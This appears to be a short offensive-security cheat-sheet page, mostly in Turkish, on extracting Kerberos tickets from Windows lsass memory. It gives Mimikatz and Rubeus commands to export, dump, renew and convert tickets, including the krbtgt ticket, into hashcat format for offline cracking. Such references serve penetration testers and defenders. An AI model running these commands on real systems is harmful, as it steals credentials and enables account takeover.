Harvesting tickets from Windows

Windows'taki biletler, güvenlik politikalarını yönetmekten sorumlu olan lsass (Yerel Güvenlik Otoritesi Alt Sistemi Servisi) süreci tarafından yönetilir ve saklanır. Bu biletleri çıkarmak için lsass süreci ile etkileşimde bulunmak gereklidir. Yönetici olmayan bir kullanıcı yalnızca kendi biletlerine erişebilirken, bir yönetici sistemdeki tüm biletleri çıkarmak için ayrıcalığa sahiptir. Bu tür işlemler için Mimikatz ve Rubeus araçları yaygın olarak kullanılmakta olup, her biri farklı komutlar ve işlevsellikler sunmaktadır.

Mimikatz

Mimikatz, Windows güvenliği ile etkileşimde bulunabilen çok yönlü bir araçtır. Bilet çıkarmanın yanı sıra çeşitli diğer güvenlik ile ilgili işlemler için de kullanılır.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus, Kerberos etkileşimi ve manipülasyonu için özel olarak tasarlanmış bir araçtır. Bilet çıkarımı ve yönetimi ile diğer Kerberos ile ilgili etkinlikler için kullanılır.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

Bu komutları kullanırken, <BASE64_TICKET> ve <luid> gibi yer tutucuları gerçek Base64 kodlu bilet ve Oturum Açma Kimliği ile değiştirdiğinizden emin olun. Bu araçlar, biletleri yönetmek ve Windows'un güvenlik mekanizmalarıyla etkileşimde bulunmak için kapsamlı işlevsellik sağlar.

Referanslar

• https://www.tarlogic.com/en/blog/how-to-attack-kerberos/